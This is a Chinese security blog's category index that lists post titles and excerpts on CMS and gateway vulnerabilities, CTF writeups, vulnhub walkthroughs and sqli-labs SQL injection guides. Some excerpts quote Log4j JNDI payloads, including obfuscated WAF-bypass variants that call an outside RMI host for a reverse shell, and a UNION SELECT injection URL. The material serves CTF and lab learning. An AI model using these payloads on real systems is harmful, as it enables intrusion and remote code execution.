![](https://img-blog.csdnimg.cn/20200517185807814.jpg?x-oss-process=image/resize,m_fixed,h_224,w_224)
web安全
文章平均质量分 68
web
keepb1ue
临渊羡鱼 不如退而结网
展开
-
大华DSS user_toLoginPage.action命令执行漏洞
大华DSS 数字监控系统是大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华存在前台命令执行漏洞,攻击者可以通过此漏洞获取服务器权限。原创 2024-07-07 21:45:44 · 265 阅读 · 0 评论 -
DedeCMS 未授权远程命令执行漏洞分析
DedeCMS是国内专业的PHP网站内容管理系统-织梦内容管理系统,采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY自己的网站提供了强有力的支持。高效率标签缓存机制:允许对同类的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。原创 2024-04-12 10:56:42 · 975 阅读 · 2 评论 -
Safedog 4.0 bypass绕过
Safedog 4.0 bypass绕过原创 2023-02-28 16:55:20 · 3478 阅读 · 0 评论 -
泰山杯:文件包含
convert.iconv.*过滤器的使用原创 2023-01-13 15:21:22 · 1528 阅读 · 2 评论 -
XCTF:ics-05
php伪协议 + preg_replace+/e修正符命令执行原创 2023-01-12 15:50:51 · 1412 阅读 · 0 评论 -
XCTF:NewsCenter
一道简单的常规注入题原创 2023-01-12 11:43:36 · 1629 阅读 · 0 评论 -
XCTF:cat
django编码问题配合CURLOPT_SAFE_UPLOAD导致任意文件读取php cURL CURLOPT_SAFE_UPLOADdjango DEBUG mode原创 2023-01-12 10:45:32 · 3316 阅读 · 0 评论 -
Java Hessian反序列化漏洞
Java Hessian反序列化漏洞复现原创 2023-01-10 14:43:59 · 4308 阅读 · 0 评论 -
2023 Real World CTF体验赛部分Writeup
2023 Real World CTF体验赛部分Writeup原创 2023-01-09 00:00:00 · 2996 阅读 · 0 评论 -
2022 Real World CTF体验赛Writeup
还是太菜了 不配打Real World正赛(神仙打架),打打体验赛压压惊。log4flag提示log4j,测试payload:${jndi:rmi://xxx.dnslog.cn/Exp}存在检测,bypass payload:${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.xxx.xxx.xxx:1099/siavc8}直接搭建jndi服务,尝试反弹shellflag:rwctf{d4b4b837f95542aa9原创 2022-01-23 10:00:00 · 7466 阅读 · 1 评论 -
CVE-2021-45232 Apache-apisix-dashboard 未授权到RCE
Apache APISIX介绍Apache APISIX是一个动态、实时、高性能的API网关。提供了丰富的流量管理功能,如负载均衡、动态上游、canary释放、断路、认证、可观察性等。也可以使用Apache APISIX来处理传统的南北向流量,以及服务之间的东西向流量。它也可以用作k8s的ingress控制器。漏洞概述该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet原创 2022-01-20 17:29:37 · 5174 阅读 · 0 评论 -
长安“战役“网络安全卫士守护赛
文章目录Webshiro?RCE_No_ParaFlag配送中心Misc迷宫朴实无华的取证无字天书stegbinaryCryptono_cry_no_bbno_cry_no_canno_math_no_cryReversecombat_slogancute_dogeWebshiro?很明显不是一般的shiro,很多命令都不能用,又是Sprintboot框架,那可以尝试log4j RCE发现存在WAF检测,bypass测试绕过:${${::-j}ndi:rmi://r5qm53.dnslog.cn/原创 2022-01-14 10:29:21 · 2253 阅读 · 0 评论 -
PHP反序列化字符串溢出
反序列化字符串逃逸常见于CTF中,所以在这里记录下导致反序列化字符串逃逸的原因:是因为对序列化后的字符进行过滤,导致用户可控字符溢出,从而控制序列化内容,配合对象注入导致RCE。0x01:Track在学习反序列化字符串逃逸之前,首先要了解反序列化的一些小Track:php在反序列化时,底层代码是以 ; 作为字段的分隔,以 ;} 作为结尾,并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。class A{ public $T1 = '123'; p原创 2021-12-29 16:16:27 · 6351 阅读 · 0 评论 -
vulnhub靶机:DMV
靶机配置说明:靶机下载地址:https://www.vulnhub.com/entry/dmv-1,462/靶机:DMV (VirtualBox) IP:192.168.56.112攻击机:Kali(VMware) IP:192.168.56.108在下载地址中有详细的靶机说明,而DMV需要寻找的flag总数为2个。靶机环境配置:将靶机和kali都桥接到同一张网卡即可,这里我都桥接到virtualBox的Host-only网卡,保证无干扰目标。确定目标ip:确定目标ip,这里我使用net原创 2020-10-09 08:22:01 · 3531 阅读 · 0 评论 -
vulnhub靶机:DC-2
靶机配置说明靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/靶机:DC1 (VirtualBox) IP:192.168.56.111攻击机:Kali(VMware) IP:192.168.56.108在下载地址中也有详细的靶机说明,而FunBox需要寻找的flag总数为5个靶机环境配置:还是一样,将其桥接到同一张网卡即可。靶机渗透开始:kali IP:第一步还是需要确定目标IP确定目标ip为192.168.56.111后nmap扫描下端原创 2020-09-29 11:38:33 · 2617 阅读 · 3 评论 -
vulnhub靶机:FunBox
靶机配置说明:靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/靶机:DC1 (VirtualBox) IP:192.168.56.109攻击机:Kali(VMware) IP:192.168.56.108在下载地址中有也有详细的靶机说明,而FunBox需要寻找的flag总数为1个。靶机环境配置:将靶机和kali都桥接到同一张网卡即可,这里我都桥接到virtualBox的Host-only网卡,保证无干扰目标。靶机渗透开始:先看下手里的原创 2020-09-28 13:28:14 · 3048 阅读 · 0 评论 -
vulnhub靶机:DC-1
文章目录靶机配置说明:靶机环境配置:靶机渗透开始:确定目标ip:端口扫描:常规扫描下目录:msf漏洞利用:切换到交互式shell:获取敏感信息:重置管理员密码:添加管理员用户:suid提权:靶机配置说明:靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/靶机:DC1 (VirtualBox) IP:192.168.56.110攻击机:Kali(VMware) IP:192.168.56.108在下载地址中有详细的靶机说明,而DC-1需要寻找的flag总数为原创 2020-09-28 00:11:01 · 1859 阅读 · 1 评论 -
sqli-labs通关攻略54-65[Challenges]
Advanced Injections文章目录Advanced Injectionsless-54less-55less-56less-60less-62less-63less-64less-65最后一篇补上。less-54字符型注入,只不过这里只能限制十次查询,超过十次就会随机更换表名和字段名。也就是说我们要在10次内查询所有结果,这其实是够的。http://127.0.0.1/sql-labs/less-54/index.php?id=-1' union select 1,version(原创 2020-09-02 23:12:40 · 12191 阅读 · 0 评论 -
sqli-labs通关攻略38-53[Stacked Injections]
Stacked Injections文章目录Stacked Injectionsless-38less-39less-40less-41less-42less-43less-44less-45less-46less-47less-48less-49less-50less-51less-52less-53less-38由于在这里使用了执行一个或多个sql语句的函数mysqli_multi_query。所以可以尝试堆叠注入,堆叠注入就是执行多条SQL语句,通过;分割;在实战中,由于正常数据库只会回显出原创 2020-08-10 17:58:18 · 5279 阅读 · 0 评论 -
sqli-labs通关攻略23-37[Advanced Injections]
Advanced Injections文章目录Advanced Injectionsless-23less-24less-25less-25aless-26less-26aless-27less-27aless-28less-28aless-29less-30less-31less-32less-33less-34less-35less-36less-37less-23在这里将注释符给过滤了,也就是说我们不能通过注释注释后面符号进行闭合,闭合思路不止一种,我们可以构造出一个’来与后面的进行闭合,比如原创 2020-08-07 13:39:13 · 5799 阅读 · 0 评论 -
sqli-labs通关攻略1-22[Basic Injections]
基于单引号的报错字符型注入先用单引号测试根据报错信息可以知道多了个单引号,最外边的’‘的单引号可以忽略,它不是SQL语句中的单引号,而是报错提示根据报错位置添加的。很明显sql语句变成’1’’ LIMIT 0,1,而我们需要做的是闭合前面的语句,然后在后面拼接我们需要注入查询的语句。查看源码跟我们推测的一样,根据SQL语句闭合前面,注释后面的’拼接的原SQL语句如下:(红框是我们能控制的$id)很明显,我们在前面拼接了一个’而把后面的’注释了这样我们就能进行注入SQL语句进行查询我们想要的信原创 2020-08-03 22:26:13 · 6874 阅读 · 1 评论 -
sqli-labs靶场的搭建与环境的安装
sqli-labs介绍很多时候新手在学习sql注入的时候,往往找不到合适的靶场进行练习操作。而sqli-labs就是一个适合新手去练习注入的一个专业的SQL注入练习平台,是一个印度程序员写的程序,用来学习sql注入的一个游戏教程。其中包含了各种各样的注入姿势,并适用于GET和POST等场景,包含了以下注入:1. 基于错误的注入(Union Select)字符串整数2. 报错注入3. 盲注(基于Bool数据类型注入、基于时间注入)4. mysql 读写文件5. 更新查询注入(update )原创 2020-08-03 21:01:20 · 13567 阅读 · 7 评论 -
mysql 报错注入原理及部分函数讲解
文章目录报错注入原理报错函数:updatexml()extractvalue()floor()MySQL版本报错函数利用(参考)报错注入原理报错注入的使用场景一般是在页面无法显示数据库的信息,但是是有报错内容的,我们就可以尝试利用报错手段报错将错误信息与子查询语句查询到的内容带出,当然,并不局限于这种场景,只要是有将mysql错误输出,都可以尝试进行报错注入。报错注入形式上一般是做两个嵌套的查询,里面的那个查询被称为子查询,执行顺序也是从子查询开始的,所以我们可以通过子查询查询我们想要的数据,然后在原创 2020-05-17 10:58:34 · 3874 阅读 · 0 评论